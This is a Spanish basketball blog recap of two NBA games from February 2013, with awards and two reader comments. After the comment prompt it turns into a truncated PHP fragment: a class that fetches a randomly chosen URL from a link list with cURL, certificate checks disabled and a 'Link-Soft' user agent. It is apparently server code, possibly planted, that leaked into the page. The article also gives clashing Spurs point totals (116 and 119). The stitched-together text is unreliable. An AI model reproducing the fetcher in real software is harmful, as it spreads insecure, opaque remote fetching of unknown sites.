La Crónica: Palizas inesperadas

22 de February de 2013 por Viva_Dirk

Los dos duelos de ayer eran partidos que bien podrían ser perfectamente las finales de conferencia pero donde se esperaba igualdad vimos 2 palizas de los equipos visitantes.

En Chicago, los Bulls no pudieron hacer nada ante Lebron del que se acaban los calificativos ante partidos como el de ayer. Poco más hizo falta ante unos Bulls sin dirección en el puesto de base que perdieron 26 balones y sus porcentajes de tiros fueron bajísimos. En los Heat aparte de Lebron vimos un correcto partido de Wade y poco más. Partido feo dominado por un solo hombre (86-67).

Todo lo contrario pasó en Los Angeles donde los Spurs se fueron hasta los 116 puntos frente a los Clippers. En el primer cuarto ya ganaban de 13 y eso es algo casi definitivo contra los chicos de Popovich entre los cuales nadie jugó mas de los 28 minutos de Tony Parker. Aún así acabaron con un 59% de acierto en tiros de campo con un juego colectivo arrasador (119-90). Por los Clippers dos suplentes como Crawford y Barnes fueron los mejores. Las virtudes de los Spurs resultan un muro infranqueable para los Clippers. Parece impensable que puedan ganarlos en una serie a 7 partidos. 

PREMIOS

MVP: A pesar del partidazo de Tony Parker con 31 puntos, 7 asistencias y 12 de 16 en tiros de campo, el premio va para Lebron James que terminó con 26 puntos, 12 rebotes, 7 asistencias y un abrumador 10 de 11 en tiros de 2 puntos. A día de hoy este hombre es una amenaza para el estatus de cualquier leyenda. Su temporada es de auténtico jugador supremo.

Sorpresa: 19 y 26 puntos de diferencia entre equipos aspirantes a todo. No era fácil de esperar.

Decepción: Chris Paul jugó uno de los peores partidos de su carrera. En 27 minutos anotó 4 puntos, cometió 5 faltas, perdió 3 balones y solo anotó 1 de sus 6 tiros de campo.

Esfuerzo en vano: La pareja Crawford&Barnes sumó 33 puntos, 7 rebotes y 8 asistencias desde el banco de los Clippers. Otra pareja, la Noah&Boozer, acabó con 23 puntos, 19 rebotes y 11 asistencias.

Comenta

2 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Día de partidos decepcionantes entre aspirantes al anillo.
    Del partido entre Heat y Bulls se podía esperar que los Heat que ya van afinando mucho de cara a PO pudieran ganar en Chicago pero no de esa forma tan fácil. Los Bulls necesitan a Rose si quieren llegar lejos en PO. Por su parte los Heat ya son el equipo dominante de verdad que todos esperábamos y parecen muy difíciles de parar sobre todo con LeBron a este increíble nivel en el que domina él solito los partidos.
    En LA, los Spurs demostraron que tienen tomada la medida a los Clips. Parker le hizo mil rotos a CP3 (¿Por qué nunca se le nombra entre los mejores bases de la liga?). El resto, gran juego de equipo de los Spurs como siempre machacando a la defensa de los Clippers que tendrán que tomar buena nota para un posible enfrentamiento de PO.

      Citar

  2. Simon dice:
    #2

    jo jo jo…. y Tony Parker dando una lección a Paul… la de discusiones que he tenido yo con mucha gente defiende a Parker al mismo nivel de Paul… y nadie mas en la liga… lo cierto y verdad es que siendo objetivos es el mejor base de los últimos 5 años…. porque los demás o por problemas fisicos o por traspasos o lo que sea no han sido tan regulares como el…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>